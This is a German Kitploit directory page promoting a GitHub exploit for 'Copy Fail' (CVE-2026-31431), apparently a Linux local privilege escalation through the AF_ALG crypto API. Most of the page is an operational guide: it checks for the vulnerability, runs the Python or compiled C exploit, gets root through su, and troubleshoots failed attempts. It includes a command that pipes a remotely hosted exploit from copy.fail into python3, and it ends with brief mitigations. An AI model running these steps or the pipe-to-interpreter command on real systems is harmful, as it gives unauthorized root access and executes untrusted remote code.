Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
Privilege EscalationExploit-FrameworksSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

Die meisten Linux-LPEs benötigen ein Race-Window oder einen kernelspezifischen Offset. Copy Fail ist ein geradliniger Logikfehler, er benötigt keines von beidem. Dasselbe 732-Byte-Python-Skript (oder .c-ELF) rootet jede Linux-Distribution, die seit 2017 ausgeliefert wurde.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
108229vor 4 MonatenVon Kitploit geprüft

Copy Fail (CVE-2026-31431) – Leitfaden zur Nutzung des Exploits

⚠️ Haftungsausschluss

Dieser Inhalt dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Führen Sie dies NICHT auf Systemen ohne ausdrückliche Genehmigung aus.


📌 Übersicht

Copy Fail (CVE-2026-31431) ist eine Linux-Schwachstelle zur lokalen Rechteausweitung (LPE), die die Kernel-Crypto-API über AF_ALG betrifft.

Sie ermöglicht es einem nicht privilegierten Benutzer, Page-Cache-Daten einer SUID-Binärdatei (z. B. /usr/bin/su) zu überschreiben und Root-Zugriff zu erlangen.


🧠 Voraussetzungen

Systemanforderungen

  • Linux-Kernel (anfällig – abhängig vom Patch-Status)
  • AF_ALG aktiviert
  • algif_aead-Modul geladen

Anforderungen an den Python-Exploit

  • Python 3.10+
  • Unterstützung für:
    • os.splice
    • socket(AF_ALG)

🔍 Überprüfung der Schwachstelle

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

Erwartete Indikatoren:

  • authencesn(hmac(sha256),cbc(aes))
  • algif_aead geladen

🐍 Ausführen des Python-Exploits

1. Direkt ausführen

root@kitploit:~
python3 copy_fail_exp.py

2. Oder per curl (falls remote gehostet)

root@kitploit:~
curl https://copy.fail/exp | python3

3. Root-Shell auslösen

root@kitploit:~
su
id

Erwartetes Ergebnis:

root@kitploit:~
uid=0(root)

⚠️ Häufige Probleme (Python)

❌ Fehler: os.splice nicht gefunden

Ursache:

  • Python-Version < 3.10
  • Eingeschränkter Build

Lösung:

  • Eine neuere Python-Binärdatei verwenden
  • Einen statischen Python-Interpreter hochladen

⚙️ Kompilieren der C-Version

1. Kompilieren

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. Ausführbar machen

root@kitploit:~
chmod +x copy_fail

3. Exploit ausführen

root@kitploit:~
./copy_fail
su

⚠️ Häufige Probleme (C)

❌ Exploit läuft, aber kein Root

Mögliche Ursachen:

  • Kernel gepatcht
  • Falsche Offsets
  • Abweichende Umgebung

❌ Kompilierungsfehler

Erforderliche Tools installieren:

root@kitploit:~
apt update && apt install build-essential

🧪 Fehlerbehebung

Prüfen, ob das System gepatcht ist

root@kitploit:~
dmesg | grep -i alg

Modul verifizieren

root@kitploit:~
lsmod | grep algif_aead

🛡️ Gegenmaßnahmen

Anfälliges Modul deaktivieren

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

Kernel-Patch anwenden

System aktualisieren:

root@kitploit:~
apt update && apt upgrade

📌 Hinweise

  • Der Exploit verändert nur den Page-Cache (nicht persistent)
  • Erfordert lokalen Zugriff
  • Standardmäßig nicht remote ausnutzbar

🧠 Abschließende Erkenntnis

Wenn der Exploit fehlschlägt, ziehen Sie Folgendes in Betracht:

  • Kernel bereits gepatcht
  • Umgebungseinschränkungen
  • Alternative Vektoren zur Rechteausweitung (SUID, Capabilities, sudo-Fehlkonfiguration)

📚 Referenzen

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 Hinweise des Autors

Verwenden Sie diesen Exploit verantwortungsvoll nur in Laboren, CTFs und autorisierten Penetrationstests.

Tool herunterladen